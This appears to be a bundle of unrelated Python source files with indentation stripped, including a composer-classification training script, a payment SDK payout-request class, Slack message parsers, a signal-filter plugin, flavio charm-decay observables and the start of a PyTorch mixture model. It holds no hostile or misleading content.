n_classes = len(y_trues[0])
wanted = list(range(n_classes))
for i in range(n_classes):
fpr[i], tpr[i], _ = roc_curve(y_trues[:, i], y_preds[:, i])
roc_auc[i] = round(auc(fpr[i], tpr[i]),2)
extra = 0
for i in range(n_classes):
axy.plot(fpr[i], tpr[i], label=f'case {tags[str(wanted[i])]}'\
f' auc {roc_auc[i]}')
axy.set_xlim([0.0, 1.0])
axy.set_ylim([0.0, 1.1])
axy.set_xlabel('False Positive Rate')
axy.set_ylabel('True Positive Rate')
axy.legend(loc="lower right")
extra = i
i = extra
axy.plot(fpr[i],fpr[i],label='null hypothesis',lw=1.5,ls=':',c='r')
return
#--------------------------
# MAIN: builds, fit and
# evaluate AI-based models
#--------------------------
# (6)
def main(**kwargs):
"""
1-Load the data
2-Build the network OR forest
3-Fit it
4-Return evaluations
KWARGS:
for all:
"case" = 'network' or 'forest'
for network:
"neurons"
"epochs"
"batch"
"lr" (learning rate)
"deep" (0-N hidden layers)
"verbose" ()
"""
#Step 0) KEYS retrieval
#---------------------------------------------------
batch = kwargs.get('batch',32)
epochs = kwargs.get('epochs',100)
neurons = kwargs.get('neurons',16)
verbose = kwargs.get('verbose',1)
LR = kwargs.get('lr',0.01)
deep = kwargs.get('deep',0)
case = kwargs.get('case','network')
#Step 1) LOAD Data
#---------------------------------------------------
with open('datasets/database.pkl','rb') as f:
data = pickle.load(f)
# Fix keys! "total-train"-->"train"
data['train'] = data['total-train']
del(data['total-train'])
#Step 2) BUILD the network OR forest
#---------------------------------------------------
if case=='network':
# One Hot Encoding:
# ytrue = [0,3,..]--> [[1,0,..], [0,0,0,1,..], ..]
#
if True:
for x in data.keys():
data[x] = (data[x][0],
OneHotEncoder().fit_transform(
data[x][1].reshape(-1,1)
).toarray(),)
# INFO: there are 8 composers
last_neur_shape = 8
# First layer!
architecture = [Dense(neurons,activation='selu',
input_shape=(len(data['train'][0][0]),),
kernel_initializer = LecunNormal(),
),]
# Hidden layer!
architecture += [Dense(neurons,
activation='selu',
kernel_initializer = LecunNormal(),
),
]
# N=deep extra layers are added!
if deep:
architecture += [Dense(neurons,
activation='selu',
kernel_initializer = LecunNormal(),
)] * deep
# Last layer!
architecture += [Dense(
last_neur_shape,
activation='softmax'),
]
# Build the model!
model = Sequential(architecture)
# Use as multiclassification metric
# the area under the roc curves!
auc_metric = AUC(num_thresholds=200,
curve="ROC",
summation_method="interpolation",
name=None,
dtype=None,
thresholds=None,
multi_label=False,
label_weights=None,)
# Compile the model and fit it!
model.compile(
optimizer=SGD(learning_rate=LR),
loss='categorical_crossentropy',
metrics=[auc_metric])
# check in console that architecture was as required!
print(model.summary())
history = model.fit(data['train'][0], data['train'][1],
batch_size = batch, epochs = epochs,
verbose=verbose,
validation_data=(data['val'][0], data['val'][1]))
#3) Evaluate the network
history = history.history
history['ypred'] = model.predict(data['val'][0])
history['ytrue'] = data['val'][1]
# Save VALIDATION predictions and correct values
local_dictionary = {
'true': np.argmax(history['ytrue'],1),
'predicted': np.argmax(history['ypred'],1),
}
with open(f'results/val-network-predictions.csv', 'a') as f:
pd.DataFrame(local_dictionary).to_csv(
f, mode='a', header=f.tell()==0, index=False)
# Save TESTING predictions and correct values
local_dictionary = {
'predicted': np.argmax(model.predict(data['test'][0]),1),
'true': np.argmax(data['test'][1],1),
}
with open(f'results/test-network-predictions.csv', 'a') as f:
pd.DataFrame(local_dictionary).to_csv(
f, mode='a', header=f.tell()==0, index=False)
return history, 'network'
elif case=='forest':
# Build and fit!
clf = RandomForestClassifier(n_estimators=200)
clf.fit(
data['train'][0],
data['train'][1], )
history = {}
history['ypred'] = clf.predict(data['val'][0])
history['ytrue'] = data['val'][1]
# Save VALIDATION predictions and correct values
local_dictionary = {
'true': history['ytrue'],
'predicted': history['ypred'],
}
with open(f'results/val-forest-predictions.csv', 'a') as f:
pd.DataFrame(local_dictionary).to_csv(
f, mode='a', header=f.tell()==0, index=False)
# Save TESTING predictions and correct values
local_dictionary = {
'predicted': clf.predict(data['test'][0]),
'true': data['test'][1],
}
with open(f'results/test-forest-predictions.csv', 'a') as f:
pd.DataFrame(local_dictionary).to_csv(
f, mode='a', header=f.tell()==0, index=False)
return history, 'forest'
#----------------------------------e-n-d--o-f--f-u-n-c-t-i-o-n-s-------
if __name__=='__main__':
def neuron_definer(n: int, deep: int, features: int):
"""
Calculate the neural network neurons
from the "data/degrees of freedom"
required input
"""
x = Symbol('x')
with open('datasets/database.pkl','rb') as f:
data = pickle.load(f)
L = len(data['total-train'][1])
del(data)
return float(max(solve(L/(x*(features+10)+(1+deep)*(x**2))-1-n, x)))
if True:
if sys.argv[11]=='network':
params = []
for x in sys.argv[1:5]:
params += [int(x)]
[NEU, EPO, BA, dp, LR] = [*params,float(sys.argv[5])]
features = (
int(sys.argv[12]) * float(sys.argv[8]) *
(1-1/4 * (1-int(sys.argv[10]))) +
int(sys.argv[6]) )
NEU = neuron_definer(NEU, dp, features)
NEU = int(NEU)+1
backend_wrapper(
lambda: simple_plotter(*pickle_bridge(
*main(
neurons=NEU, epochs=EPO,
batch=BA, verbose=1,
deep=dp, lr=LR,
case = sys.argv[11],
))))
elif sys.argv[11]=='forest':
params = []
backend_wrapper(
lambda: simple_plotter(*pickle_bridge(
*main(
case = sys.argv[11],
))))
|
from zotapaysdk.mg_requests.objects import MGRequestParam
from zotapaysdk.mg_requests.mg_request import MGRequest
class MGPayoutRequest(MGRequest):
# pylint: disable=missing-function-docstring
def __init__(self, **kwargs):
self._merchant_order_id = \
MGRequestParam(self.PayoutRequestParameters.MERCHANT_ORDER_ID.request_param_name,
kwargs.get(
self.PayoutRequestParameters.MERCHANT_ORDER_ID.arg_name,
None),
max_size=128,
required=True)
self._merchant_order_desc = \
MGRequestParam(self.PayoutRequestParameters.MERCHANT_ORDER_DESC.request_param_name,
kwargs.get(self.PayoutRequestParameters.MERCHANT_ORDER_DESC.arg_name,
None),
max_size=128,
required=True)
self._order_amount = \
MGRequestParam(self.PayoutRequestParameters.ORDER_AMOUNT.request_param_name,
kwargs.get(self.PayoutRequestParameters.ORDER_AMOUNT.arg_name,
None),
max_size=12,
required=True)
self._order_currency = \
MGRequestParam(self.PayoutRequestParameters.ORDER_CURRENCY.request_param_name,
kwargs.get(self.PayoutRequestParameters.ORDER_CURRENCY.arg_name,
None),
max_size=3,
required=True)
self._customer_email = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_EMAIL.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOMER_EMAIL.arg_name,
None),
max_size=50,
required=False)
self._customer_first_name = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_FIRST_NAME.request_param_name,
kwargs.get(
self.PayoutRequestParameters.CUSTOMER_FIRST_NAME.arg_name,
None),
max_size=50,
required=True)
self._customer_last_name = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_LAST_NAME.request_param_name,
kwargs.get(
self.PayoutRequestParameters.CUSTOMER_LAST_NAME.arg_name,
None),
max_size=50,
required=True)
self._customer_phone = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_PHONE.request_param_name,
kwargs.get(
self.PayoutRequestParameters.CUSTOMER_PHONE.arg_name,
None),
max_size=15,
required=True)
self._customer_ip = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_IP.request_param_name,
kwargs.get(
self.PayoutRequestParameters.CUSTOMER_IP.arg_name,
None),
max_size=20,
required=True)
self._customer_bank_code = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_BANK_CODE.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOMER_BANK_CODE.arg_name,
None),
max_size=8,
required=False)
self._customer_bank_account_number = \
MGRequestParam(
self.PayoutRequestParameters.CUSTOMER_BANK_ACCOUNT_NUMBER.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOMER_BANK_ACCOUNT_NUMBER.arg_name,
None),
max_size=15,
required=True)
self._customer_bank_account_name = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_BANK_ACCOUNT_NAME.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOMER_BANK_ACCOUNT_NAME.arg_name,
None),
max_size=128,
required=True)
self._customer_bank_branch = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_BANK_BRANCH.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOMER_BANK_BRANCH.arg_name,
None),
max_size=128,
required=False)
self._customer_bank_address = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_BANK_ADDRESS.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOMER_BANK_ADDRESS.arg_name,
None),
max_size=128,
required=False)
self._customer_bank_zip_code = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_BANK_ZIP_CODE.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOMER_BANK_ZIP_CODE.arg_name,
None),
max_size=15,
required=False)
self._customer_bank_routing_number = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_BANK_ROUTING_NUMBER.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOMER_BANK_ROUTING_NUMBER.arg_name,
None),
max_size=16,
required=False)
self._customer_bank_province = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_BANK_PROVINCE.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOMER_BANK_PROVINCE.arg_name,
None),
max_size=64,
required=False)
self._customer_bank_area = \
MGRequestParam(self.PayoutRequestParameters.CUSTOMER_BANK_AREA.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOMER_BANK_AREA.arg_name,
None),
max_size=64,
required=False)
self._callback_url = \
MGRequestParam(self.PayoutRequestParameters.CALLBACK_URL.request_param_name,
kwargs.get(
self.PayoutRequestParameters.CALLBACK_URL.arg_name,
None),
max_size=128,
required=False)
self._custom_param = \
MGRequestParam(self.PayoutRequestParameters.CUSTOM_PARAM.request_param_name,
kwargs.get(self.PayoutRequestParameters.CUSTOM_PARAM.arg_name,
None),
max_size=128,
required=False)
self._redirect_url = \
MGRequestParam(self.PayoutRequestParameters.REDIRECT_URL.request_param_name,
kwargs.get(self.PayoutRequestParameters.REDIRECT_URL.arg_name,
None),
max_size=128,
required=True)
@property
def merchant_order_id(self):
return self._merchant_order_id.param_value
def set_merchant_order_id(self, value):
self._merchant_order_id.set_value(value)
return self
@property
def merchant_order_desc(self):
return self._merchant_order_desc.param_value
def set_merchant_order_desc(self, value):
self._merchant_order_desc.set_value(value)
return self
@property
def order_amount(self):
return self._order_amount.param_value
def set_order_amount(self, value):
self._order_amount.set_value(value)
return self
@property
def order_currency(self):
return self._order_currency.param_value
def set_order_currency(self, value):
self._order_currency.set_value(value)
return self
@property
def customer_email(self):
return self._customer_email.param_value
def set_customer_email(self, value):
self._customer_email.set_value(value)
return self
@property
def customer_first_name(self):
return self._customer_first_name.param_value
def set_customer_first_name(self, value):
self._customer_first_name.set_value(value)
return self
@property
def customer_last_name(self):
return self._customer_last_name.param_value
def set_customer_last_name(self, value):
self._customer_last_name.set_value(value)
return self
@property
def customer_phone(self):
return self._customer_phone.param_value
def set_customer_phone(self, value):
self._customer_phone.set_value(value)
return self
@property
def customer_ip(self):
return self._customer_ip.param_value
def set_customer_ip(self, value):
self._customer_ip.set_value(value)
return self
@property
def customer_bank_code(self):
return self._customer_bank_code.param_value
def set_customer_bank_code(self, value):
self._customer_bank_code.set_value(value)
return self
@property
def customer_bank_account_number(self):
return self._customer_bank_account_number.param_value
def set_customer_bank_account_number(self, value):
self._customer_bank_account_number.set_value(value)
return self
@property
def customer_bank_account_name(self):
return self._customer_bank_account_name.param_value
def set_customer_bank_account_name(self, value):
self._customer_bank_account_name.set_value(value)
return self
@property
def customer_bank_branch(self):
return self._customer_bank_branch.param_value
def set_customer_bank_branch(self, value):
self._customer_bank_branch.set_value(value)
return self
@property
def customer_bank_address(self):
return self._customer_bank_address.param_value
def set_customer_bank_address(self, value):
self._customer_bank_address.set_value(value)
return self
@property
def customer_bank_zip_code(self):
return self._customer_bank_zip_code.param_value
def set_customer_bank_zip_code(self, value):
self._customer_bank_zip_code.set_value(value)
return self
@property
def customer_bank_routing_number(self):
return self._customer_bank_routing_number.param_value
def set_customer_bank_routing_number(self, value):
self._customer_bank_routing_number.set_value(value)
return self
@property
def customer_bank_province(self):
return self._customer_bank_province.param_value
def set_customer_bank_province(self, value):
self._customer_bank_province.set_value(value)
return self
@property
def customer_bank_area(self):
return self._customer_bank_area.param_value
def set_customer_bank_area(self, value):
self._customer_bank_area.set_value(value)
return self
@property
def callback_url(self):
return self._callback_url.param_value
def set_callback_url(self, value):
self._callback_url.set_value(value)
return self
@property
def custom_param(self):
return self._custom_param.param_value
def set_custom_param(self, value):
self._custom_param.set_value(value)
return self
@property
def redirect_url(self):
return self._redirect_url
def set_redirect_url(self, value):
self._redirect_url = value
return self
# def to_signed_payload(self, signature):
# payload = {}
# for _, value in self.__dict__.items():
# if isinstance(value, MGRequestParam):
# payload[value.param_name] = value.param_value
# payload[MGRequest.PayoutRequestParameters.SIGNATURE.request_param_name] = signature
# return payload
|
import re
from omnibot.services import slack
from omnibot.services import stats
def extract_users(text, bot):
statsd = stats.get_statsd_client()
with statsd.timer('parser.extract_users'):
# Example: <@U024BE7LH> or <@U024BE7LH|bob-marley> or <@W024BE7LH|bob-marley>
user_arr = {}
users = re.findall('<@[UW]\w+(?:\|[\w-]+)?>', text)
for user in users:
match = re.match('<@([UW]\w+)(\|[\w-]+)?>', user)
user_name = None
if match.group(2) is not None:
# user name is embedded; use the second match and strip |
user_name = match.group(2)[1:]
else:
user_id = match.group(1)
user_data = slack.get_user(bot, user_id)
if user_data:
user_name = user_data['name']
user_arr[user] = user_name
return user_arr
def replace_users(text, users):
for user, user_name in users.items():
if user_name is not None:
text = text.replace(
user,
'@{}'.format(user_name)
)
return text
def extract_channels(text, bot):
statsd = stats.get_statsd_client()
with statsd.timer('parser.extract_channels'):
# Example: <#C024BE7LR> or <#C024BE7LR|general-room>
channel_arr = {}
channels = re.findall('<#C\w+(?:\|[\w-]+)?>', text)
for channel in channels:
match = re.match('<#(C\w+)(\|[\w-]+)?>', channel)
channel_name = None
if match.group(2) is not None:
# channel name is embedded; use the second match and strip |
channel_name = match.group(2)[1:]
else:
channel_id = match.group(1)
channel_data = slack.get_channel(bot, channel_id)
if not channel_data:
continue
channel_name = channel_data['name']
channel_arr[channel] = channel_name
return channel_arr
def replace_channels(text, channels):
for channel, channel_name in channels.items():
if channel_name is not None:
text = text.replace(
channel,
'#{}'.format(channel_name)
)
return text
def extract_subteams(text, bot):
statsd = stats.get_statsd_client()
# TODO: parse this
with statsd.timer('parser.extract_subteams'):
# Example: <!subteam^S012345|happy-peeps>
# subteams = re.findall(
# '<!subteam\^S\w+(?:\|@[\w-]+)?>',
# metadata['text']
# )
subteam_arr = {}
# for subteam in subteams:
# metadata['subteams'][subteam] = None
return subteam_arr
def extract_specials(text):
statsd = stats.get_statsd_client()
with statsd.timer('parser.extract_specials'):
# Example: <!here|@here>
specials = re.findall('<!\w+(?:\|@[\w-]+)?>', text)
special_arr = {}
for special in specials:
match = re.match('<!(\w+)(?:\|@[\w-]+)?>', special)
special_label = None
if match.group(1) is not None:
special_label = '@{}'.format(match.group(1))
special_arr[special] = special_label
return special_arr
def replace_specials(text, specials):
for special, special_label in specials.items():
if special_label is not None:
text = text.replace(
special,
special_label
)
return text
def extract_emojis(text):
statsd = stats.get_statsd_client()
with statsd.timer('parser.extract_emojis'):
# Example: :test_me: or :test-me:
emojis = re.findall(':[a-z0-9_\+\-]+:', text)
emoji_arr = {}
for emoji in emojis:
match = re.match(':([a-z0-9_\+\-]+):', emoji)
emoji_name = None
if match.group(1) is not None:
emoji_name = match.group(1)
emoji_arr[emoji] = emoji_name
return emoji_arr
def extract_emails(text):
statsd = stats.get_statsd_client()
with statsd.timer('parser.extract_emails'):
# Example: <mailto:example@example.com|example@example.com>
emails = re.findall(
# [^>]* is non-greedy .*
'<mailto:([^>]*)(?:\|[^>]*)?>',
text
)
email_arr = {}
for email in emails:
unparsed_email = '<mailto:{0}>'.format(email)
email_label = email.split('|')[0]
email_arr[unparsed_email] = email_label
return email_arr
def replace_emails(text, emails):
for email, email_label in emails.items():
if email_label is not None:
text = text.replace(
email,
email_label
)
return text
def extract_urls(text):
statsd = stats.get_statsd_client()
with statsd.timer('parser.extract_urls'):
# Example: <http://test.com> or <http://test.com|test.com>
# [^>]* is non-greedy .*
urls = re.findall('<(http[s]?://[^>]*)(?:\|[^>]*)?>', text)
url_arr = {}
for url in urls:
unparsed_url = '<{0}>'.format(url)
url_label = url.split('|')[0]
url_arr[unparsed_url] = url_label
return url_arr
def replace_urls(text, urls):
for url, url_label in urls.items():
if url_label is not None:
text = text.replace(
url,
url_label
)
return text
def extract_mentions(text, bot, channel):
statsd = stats.get_statsd_client()
with statsd.timer('parser.extract_mentions'):
to_me = False
at_me = '@{}'.format(bot.name)
if text.split(' ')[0] == at_me:
to_me = True
directed = channel.get('is_im') or to_me
return directed
def extract_command(text, bot):
statsd = stats.get_statsd_client()
with statsd.timer('parser.extract_command'):
at_me = '@{}'.format(bot.name)
if text.startswith(at_me):
command_text = text[len(at_me):].strip()
elif at_me in text:
command_text = re.sub(
r'.*{}'.format(at_me),
'',
text
).strip()
else:
command_text = text
return command_text
def unextract_specials(text):
statsd = stats.get_statsd_client()
with statsd.timer('parser.unextract_specials'):
# Example: @here
specials = re.findall('(@here|@channel)', text)
for special in specials:
text = text.replace(
special,
'<!{0}|{0}>'.format(special[1:])
)
return text
def unextract_channels(text, bot):
statsd = stats.get_statsd_client()
with statsd.timer('parser.unextract_channels'):
# Example: #my-channel
_channel_labels = re.findall('(^#[\w\-_]+| #[\w\-_]+)', text)
for label in _channel_labels:
channel = slack.get_channel_by_name(bot, label.strip())
if not channel:
continue
text = text.replace(
'#{}'.format(channel['name']),
'<#{0}|{1}>'.format(
channel['id'],
channel['name']
)
)
return text
def unextract_users(text, bot):
statsd = stats.get_statsd_client()
with statsd.timer('parser.unextract_users'):
# Example: @my-user
_user_labels = re.findall('(^@[\w\-_]+| @[\w\-_]+)', text)
user_labels = []
for label in _user_labels:
user_labels.append(label.strip())
for label in user_labels:
user = slack.get_user_by_name(bot, label)
if not user:
continue
text = text.replace(
label,
'<@{0}|{1}>'.format(
user['id'],
slack.get_name_from_user(user)
)
)
return text
|
from chill import *
source('datacopy34.c')
destination('datacopy4modified.c')
procedure('mm')
loop(0)
original()
tile(0,3,16)
datacopy([(0,[0,1])],4)
print_code()
|
# import the main panels structure, required
from ..panels import boxPanel
# import here your procedure-specific modules, no requirements (numpy as an example)
from scipy.signal import savgol_filter
# Set here the details of the procedure
NAME = 'SavGol' # Name, please keep it short as it will appear in the combo box of the user interface
DESCRIPTION = 'Filter the curve with a Savitzky Golay filter; ideal to preserve steps' # Free text
# set a DOI of a publication you want/suggest to be cited, empty if no reference
DOI = 'https://doi.org/10.1038/s41592-019-0686-2'
# Create your filter class by extending the main one
# Additional methods can be created, if required
class Filter(boxPanel):
def create(self):
# This function is required and describes the form to be created in the user interface
# The last value is the initial value of the field; currently 3 types are supported: int, float and combo
self.addParameter('win', 'float', 'Window size [nm]', 25)
self.addParameter('order', 'int', 'Order of the interpolation', 3)
def calculate(self, x, y, curve=None):
win = self.getValue('win')*1e-9
xstep = (max(x) - min(x)) / (len(x) - 1)
win = int(win / xstep)
polyorder = self.getValue('order')
if win % 2 == 0:
win += 1
if polyorder > win:
return False
y_smooth = savgol_filter(y, win, polyorder)
return x, y_smooth
|
r"""Functions for exclusive $D\to P\ell\nu$ decays.
Copied from `flavio.physics.bdecays.bplnu`
"""
from math import sqrt
import flavio
from flavio.physics import ckm
from flavio.classes import AuxiliaryQuantity
from flavio.config import config
from flavio.physics.running import running
from flavio.physics.bdecays import angular
from flavio.physics.bdecays.wilsoncoefficients import get_wceff_fccc
from flavio.classes import Observable, Prediction
meson_quark = {
('D+', 'pi0'): 'cd',
('D0', 'pi+'): 'cd',
('D+', 'K0'): 'cs',
('D0', 'K+'): 'cs',
}
meson_ff = {
('D+', 'pi0'): 'D->pi',
('D0', 'pi+'): 'D->pi',
('D+', 'K0'): 'D->K',
('D0', 'K+'): 'D->K',
}
def prefactor(q2, par, D, P, lep):
GF = par['GF']
ml = par['m_'+lep]
qi_qj = meson_quark[(D, P)]
if qi_qj == 'cd':
Vij = ckm.get_ckm(par)[1, 0] # V_{cd} for c->d transitions
if qi_qj == 'cs':
Vij = ckm.get_ckm(par)[1, 1] # V_{cs} for c->s transitions
if q2 <= ml**2:
return 0
return 4 * GF / sqrt(2) * Vij
def get_ff(q2, par, D, P):
ff_name = meson_ff[(D, P)] + ' form factor'
return AuxiliaryQuantity[ff_name].prediction(par_dict=par, wc_obj=None, q2=q2)
def get_angularcoeff(q2, wc_obj, par, D, P, lep):
Jlist = [_get_angularcoeff(q2, wc_obj, par, D, P, lep, nu)
for nu in ['e', 'mu', 'tau']]
J = {}
J['a'] = sum([JJ['a'] for JJ in Jlist])
J['b'] = sum([JJ['b'] for JJ in Jlist])
J['c'] = sum([JJ['c'] for JJ in Jlist])
return J
def _get_angularcoeff(q2, wc_obj, par, D, P, lep, nu):
scale = config['renormalization scale']['dpll']
mc = running.get_mc(par, scale)
wc = get_wceff_fccc(wc_obj, par, meson_quark[(D, P)][::-1], lep, nu, None, scale, nf=4)
if lep != nu and all(C == 0 for C in wc.values()):
return {'a': 0, 'b': 0, 'c': 0} # if all WCs vanish, so does the AC!
ml = par['m_' + lep]
mD = par['m_' + D]
mP = par['m_' + P]
N = prefactor(q2, par, D, P, lep)
ff = get_ff(q2, par, D, P)
qi_qj = meson_quark[(D, P)]
if qi_qj == 'cd':
mlight = running.get_md(par, scale)
if qi_qj == 'cs':
mlight = running.get_ms(par, scale)
h = angular.helicity_amps_p(q2, mD, mP, mc, mlight, ml, 0, ff, wc, N)
J = angular.angularcoeffs_general_p(h, q2, mD, mP, mc, mlight, ml, 0)
return J
def dGdq2(J):
return 2 * (J['a'] + J['c']/3.)
def dBRdq2_lep(q2, wc_obj, par, D, P, lep):
ml = par['m_' + lep]
mD = par['m_' + D]
mP = par['m_' + P]
if q2 < ml**2 or q2 > (mD-mP)**2:
return 0
tauD = par['tau_' + D]
J = get_angularcoeff(q2, wc_obj, par, D, P, lep)
if P == 'pi0':
# factor of 1/2 for neutral pi due to pi = (uubar-ddbar)/sqrt(2)
return tauD * dGdq2(J) / 2.
return tauD * dGdq2(J)
def dBRdq2(q2, wc_obj, par, D, P, lep):
if lep == 'l':
# average of e and mu!
return (dBRdq2_lep(q2, wc_obj, par, D, P, 'e') + dBRdq2_lep(q2, wc_obj, par, D, P, 'mu'))/2
else:
return dBRdq2_lep(q2, wc_obj, par, D, P, lep)
def dBRdq2_function(D, P, lep):
return lambda wc_obj, par, q2: dBRdq2(q2, wc_obj, par, D, P, lep)
def BR_binned(q2min, q2max, wc_obj, par, D, P, lep):
def integrand(q2):
return dBRdq2(q2, wc_obj, par, D, P, lep)
return flavio.math.integrate.nintegrate(integrand, q2min, q2max)
def BR_binned_function(D, P, lep):
return lambda wc_obj, par, q2min, q2max: BR_binned(q2min, q2max, wc_obj, par, D, P, lep)
def BR_binned_leptonflavour(q2min, q2max, wc_obj, par, D, P, lnum, lden):
num = BR_binned(q2min, q2max, wc_obj, par, D, P, lnum)
if num == 0:
return 0
den = BR_binned(q2min, q2max, wc_obj, par, D, P, lden)
return num / den
def BR_binned_leptonflavour_function(D, P, lnum, lden):
return lambda wc_obj, par, q2min, q2max: BR_binned_leptonflavour(q2min, q2max, wc_obj, par, D, P, lnum, lden)
def _BR_tot(wc_obj, par, D, P, lep):
mD = par['m_'+D]
mP = par['m_'+P]
ml = par['m_'+lep]
q2max = (mD-mP)**2
q2min = ml**2
return BR_binned(q2min, q2max, wc_obj, par, D, P, lep)
def BR_tot(wc_obj, par, D, P, lep):
if lep == 'l':
# average of e and mu!
return (_BR_tot(wc_obj, par, D, P, 'e')+_BR_tot(wc_obj, par, D, P, 'mu'))/2.
else:
return _BR_tot(wc_obj, par, D, P, lep)
def BR_tot_function(D, P, lep):
return lambda wc_obj, par: BR_tot(wc_obj, par, D, P, lep)
def BR_binned_tot_function(D, P, lep):
def f(wc_obj, par, q2min, q2max):
num = BR_binned(q2min, q2max, wc_obj, par, D, P, lep)
if num == 0:
return 0
den = BR_tot(wc_obj, par, D, P, lep)
return num / den
return f
def BR_tot_leptonflavour(wc_obj, par, D, P, lnum, lden):
num = BR_tot(wc_obj, par, D, P, lnum)
if num == 0:
return 0
den = BR_tot(wc_obj, par, D, P, lden)
return num/den
def BR_tot_leptonflavour_function(D, P, lnum, lden):
return lambda wc_obj, par: BR_tot_leptonflavour(wc_obj, par, D, P, lnum, lden)
# Observable and Prediction instances
_tex = {'e': 'e', 'mu': '\mu', 'l': r'\ell'}
_func = {'dBR/dq2': dBRdq2_function, 'BR': BR_tot_function, '<BR>': BR_binned_function}
_desc = {'dBR/dq2': 'Differential', 'BR': 'Total', '<BR>': 'Binned'}
_tex_br = {'dBR/dq2': r'\frac{d\text{BR}}{dq^2}', 'BR': r'\text{BR}', '<BR>': r'\langle\text{BR}\rangle'}
_args = {'dBR/dq2': ['q2'], 'BR': None, '<BR>': ['q2min', 'q2max']}
_hadr = {
'D+->K': {'tex': r"D^+\to K^0", 'D': 'D+', 'P': 'K0', },
'D0->K': {'tex': r"D^0\to K^- ", 'D': 'D0', 'P': 'K+', },
'D+->pi': {'tex': r"D^+\to \pi^0", 'D': 'D+', 'P': 'pi0', },
'D0->pi': {'tex': r"D^0\to \pi^- ", 'D': 'D0', 'P': 'pi+', },
}
# for LF ratios we don't distinguish D+ and D0 (but take D0 because we have to choose sth)
_hadr_l = {
'D->K': {'tex': r"D\to K", 'D': 'D0', 'P': 'K+', 'decays': ['D+->K', 'D0->K'],},
'D->pi': {'tex': r"D\to \pi ", 'D': 'D0', 'P': 'pi+', 'decays': ['D+->pi', 'D0->pi'],},
}
_process_taxonomy = r'Process :: $c$ hadron decays :: Semi-leptonic tree-level decays :: $D\to P\ell\nu$ :: $'
for l in ['e', 'mu', 'l']:
for M in _hadr.keys():
for br in ['dBR/dq2', 'BR', '<BR>']:
_obs_name = br + "("+M+l+"nu)"
_process_tex = _hadr[M]['tex']+_tex[l]+r"^+\nu_"+_tex[l]
_obs = Observable(_obs_name)
_obs.set_description(_desc[br] + r" branching ratio of $" + _process_tex + r"$")
_obs.tex = r'$' + _tex_br[br] + r"(" + _process_tex + r")$"
_obs.arguments = _args[br]
_obs.add_taxonomy(_process_taxonomy + _process_tex + r"$")
Prediction(_obs_name, _func[br](_hadr[M]['D'], _hadr[M]['P'], l))
# Lepton flavour ratios
for l in [('mu','e')]:
for M in _hadr_l.keys():
# binned ratio of BRs
_obs_name = "<R"+l[0]+l[1]+">("+M+"lnu)"
_obs = Observable(name=_obs_name, arguments=['q2min', 'q2max'])
_obs.set_description(r"Ratio of partial branching ratios of $" + _hadr_l[M]['tex'] +_tex[l[0]]+r"^+ \nu_"+_tex[l[0]]+r"$" + " and " + r"$" + _hadr_l[M]['tex'] +_tex[l[1]]+r"^+ \nu_"+_tex[l[1]]+r"$")
_obs.tex = r"$\langle R_{" + _tex[l[0]] + ' ' + _tex[l[1]] + r"} \rangle(" + _hadr_l[M]['tex'] + r"\ell^+\nu)$"
for li in l:
for N in _hadr_l[M]['decays']:
# add taxonomy for both processes (e.g. D->Penu and D->Pmunu) and for charged and neutral
_obs.add_taxonomy(_process_taxonomy + _hadr[N]['tex'] + _tex[li]+r"^+\nu_"+_tex[li]+r"$")
Prediction(_obs_name, BR_binned_leptonflavour_function(_hadr_l[M]['D'], _hadr_l[M]['P'], l[0], l[1]))
# ratio of total BRs
_obs_name = "R"+l[0]+l[1]+"("+M+"lnu)"
_obs = Observable(name=_obs_name)
_obs.set_description(r"Ratio of total branching ratios of $" + _hadr_l[M]['tex'] +_tex[l[0]]+r"^+ \nu_"+_tex[l[0]]+r"$" + " and " + r"$" + _hadr_l[M]['tex'] +_tex[l[1]]+r"^+ \nu_"+_tex[l[1]]+r"$")
_obs.tex = r"$R_{" + _tex[l[0]] + ' ' + _tex[l[1]] + r"}(" + _hadr_l[M]['tex'] + r"\ell^+\nu)$"
for li in l:
for N in _hadr_l[M]['decays']:
# add taxonomy for both processes (e.g. D->Penu and D->Pmunu) and for charged and neutral
_obs.add_taxonomy(_process_taxonomy + _hadr[N]['tex'] +_tex[li]+r"^+\nu_"+_tex[li]+r"$")
Prediction(_obs_name, BR_tot_leptonflavour_function(_hadr_l[M]['D'], _hadr_l[M]['P'], l[0], l[1]))
|
import json
from ingest import ingest_json_body
from housepy import config, log, strings, util
def parse(request):
log.info("ambit.parse")
sample = ingest_json_body(request)
if sample is None:
return sample, "Could not parse"
data = {}
for key, value in sample.items():
if key == "UTC":
dt = util.parse_date(value) # these are marked UTC in the data
t = util.timestamp(dt)
data['t_utc'] = t
continue
if type(value) != str:
continue
data[key] = strings.as_numeric(value)
return data
|
from typing import List, Union
import torch
from torch import nn, optim
from torch.distributions import Distribution
from tqdm import tqdm
class GeneralizedMixtureModel(nn.Module):
def __init__(self,
distributions: List[nn.Module],
max_iter=1000,
rtol=1e-8,
random_state=123,
init_cluster_ratio=None,
maximization_step=100,
learning_rate=0.001):
super().__init__()
self.distributions = nn.ModuleList(distributions)
self.max_iter = max_iter
self.rtol = rtol
torch.manual_seed(random_state)
self.maximization_step = maximization_step
self.cluster_num = len(distributions)
if init_cluster_ratio is None:
self.cluster_ratio = torch.ones(self.cluster_num) / self.cluster_num
else:
self.cluster_ratio = init_cluster_ratio / init_cluster_ratio.sum()
